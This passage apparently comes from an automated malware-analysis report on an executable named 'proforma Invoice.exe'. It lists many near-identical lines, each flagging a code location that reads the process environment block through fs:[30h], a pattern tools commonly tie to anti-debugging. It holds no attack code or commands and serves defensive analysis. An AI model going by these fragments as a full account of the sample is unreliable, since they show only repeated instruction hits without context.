                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120437C mov eax, dword ptr fs:[00000030h]3_2_0120437C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122A352 mov eax, dword ptr fs:[00000030h]3_2_0122A352
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158397 mov eax, dword ptr fs:[00000030h]3_2_01158397
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158397 mov eax, dword ptr fs:[00000030h]3_2_01158397
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01158397 mov eax, dword ptr fs:[00000030h]3_2_01158397
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118438F mov eax, dword ptr fs:[00000030h]3_2_0118438F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118438F mov eax, dword ptr fs:[00000030h]3_2_0118438F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E388 mov eax, dword ptr fs:[00000030h]3_2_0115E388
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E388 mov eax, dword ptr fs:[00000030h]3_2_0115E388
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E388 mov eax, dword ptr fs:[00000030h]3_2_0115E388
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011683C0 mov eax, dword ptr fs:[00000030h]3_2_011683C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011683C0 mov eax, dword ptr fs:[00000030h]3_2_011683C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011683C0 mov eax, dword ptr fs:[00000030h]3_2_011683C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011683C0 mov eax, dword ptr fs:[00000030h]3_2_011683C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A3C0 mov eax, dword ptr fs:[00000030h]3_2_0116A3C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E63C0 mov eax, dword ptr fs:[00000030h]3_2_011E63C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011963FF mov eax, dword ptr fs:[00000030h]3_2_011963FF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E3F0 mov eax, dword ptr fs:[00000030h]3_2_0117E3F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E3F0 mov eax, dword ptr fs:[00000030h]3_2_0117E3F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E3F0 mov eax, dword ptr fs:[00000030h]3_2_0117E3F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0121C3CD mov eax, dword ptr fs:[00000030h]3_2_0121C3CD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012043D4 mov eax, dword ptr fs:[00000030h]3_2_012043D4
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012043D4 mov eax, dword ptr fs:[00000030h]3_2_012043D4
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115823B mov eax, dword ptr fs:[00000030h]3_2_0115823B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A250 mov eax, dword ptr fs:[00000030h]3_2_0115A250
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166259 mov eax, dword ptr fs:[00000030h]3_2_01166259
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E8243 mov eax, dword ptr fs:[00000030h]3_2_011E8243
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E8243 mov ecx, dword ptr fs:[00000030h]3_2_011E8243
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115826B mov eax, dword ptr fs:[00000030h]3_2_0115826B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E284 mov eax, dword ptr fs:[00000030h]3_2_0119E284
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E284 mov eax, dword ptr fs:[00000030h]3_2_0119E284
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702A0 mov eax, dword ptr fs:[00000030h]3_2_011702A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702A0 mov eax, dword ptr fs:[00000030h]3_2_011702A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov ecx, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6500 mov eax, dword ptr fs:[00000030h]3_2_011F6500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168550 mov eax, dword ptr fs:[00000030h]3_2_01168550
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168550 mov eax, dword ptr fs:[00000030h]3_2_01168550
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E59C mov eax, dword ptr fs:[00000030h]3_2_0119E59C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01194588 mov eax, dword ptr fs:[00000030h]3_2_01194588
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162582 mov eax, dword ptr fs:[00000030h]3_2_01162582
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162582 mov ecx, dword ptr fs:[00000030h]3_2_01162582
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011845B1 mov eax, dword ptr fs:[00000030h]3_2_011845B1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011845B1 mov eax, dword ptr fs:[00000030h]3_2_011845B1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011665D0 mov eax, dword ptr fs:[00000030h]3_2_011665D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A5D0 mov eax, dword ptr fs:[00000030h]3_2_0119A5D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A5D0 mov eax, dword ptr fs:[00000030h]3_2_0119A5D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E5CF mov eax, dword ptr fs:[00000030h]3_2_0119E5CF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E5CF mov eax, dword ptr fs:[00000030h]3_2_0119E5CF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C5ED mov eax, dword ptr fs:[00000030h]3_2_0119C5ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C5ED mov eax, dword ptr fs:[00000030h]3_2_0119C5ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011625E0 mov eax, dword ptr fs:[00000030h]3_2_011625E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E5E7 mov eax, dword ptr fs:[00000030h]3_2_0118E5E7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01198402 mov eax, dword ptr fs:[00000030h]3_2_01198402
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A430 mov eax, dword ptr fs:[00000030h]3_2_0119A430
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C427 mov eax, dword ptr fs:[00000030h]3_2_0115C427
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115E420 mov eax, dword ptr fs:[00000030h]3_2_0115E420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6420 mov eax, dword ptr fs:[00000030h]3_2_011E6420
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118245A mov eax, dword ptr fs:[00000030h]3_2_0118245A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115645D mov eax, dword ptr fs:[00000030h]3_2_0115645D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E443 mov eax, dword ptr fs:[00000030h]3_2_0119E443
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118A470 mov eax, dword ptr fs:[00000030h]3_2_0118A470
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EC460 mov ecx, dword ptr fs:[00000030h]3_2_011EC460
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011944B0 mov ecx, dword ptr fs:[00000030h]3_2_011944B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EA4B0 mov eax, dword ptr fs:[00000030h]3_2_011EA4B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011664AB mov eax, dword ptr fs:[00000030h]3_2_011664AB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011604E5 mov ecx, dword ptr fs:[00000030h]3_2_011604E5
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160710 mov eax, dword ptr fs:[00000030h]3_2_01160710
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01190710 mov eax, dword ptr fs:[00000030h]3_2_01190710
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C700 mov eax, dword ptr fs:[00000030h]3_2_0119C700
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov eax, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov ecx, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119273C mov eax, dword ptr fs:[00000030h]3_2_0119273C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DC730 mov eax, dword ptr fs:[00000030h]3_2_011DC730
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C720 mov eax, dword ptr fs:[00000030h]3_2_0119C720
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C720 mov eax, dword ptr fs:[00000030h]3_2_0119C720
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE75D mov eax, dword ptr fs:[00000030h]3_2_011EE75D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160750 mov eax, dword ptr fs:[00000030h]3_2_01160750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2750 mov eax, dword ptr fs:[00000030h]3_2_011A2750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2750 mov eax, dword ptr fs:[00000030h]3_2_011A2750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4755 mov eax, dword ptr fs:[00000030h]3_2_011E4755
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov esi, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov eax, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119674D mov eax, dword ptr fs:[00000030h]3_2_0119674D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168770 mov eax, dword ptr fs:[00000030h]3_2_01168770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170770 mov eax, dword ptr fs:[00000030h]3_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120678E mov eax, dword ptr fs:[00000030h]3_2_0120678E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011607AF mov eax, dword ptr fs:[00000030h]3_2_011607AF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116C7C0 mov eax, dword ptr fs:[00000030h]3_2_0116C7C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E07C3 mov eax, dword ptr fs:[00000030h]3_2_011E07C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011647FB mov eax, dword ptr fs:[00000030h]3_2_011647FB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011647FB mov eax, dword ptr fs:[00000030h]3_2_011647FB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011827ED mov eax, dword ptr fs:[00000030h]3_2_011827ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EE7E1 mov eax, dword ptr fs:[00000030h]3_2_011EE7E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2619 mov eax, dword ptr fs:[00000030h]3_2_011A2619
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE609 mov eax, dword ptr fs:[00000030h]3_2_011DE609
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117260B mov eax, dword ptr fs:[00000030h]3_2_0117260B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E627 mov eax, dword ptr fs:[00000030h]3_2_0117E627
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01196620 mov eax, dword ptr fs:[00000030h]3_2_01196620
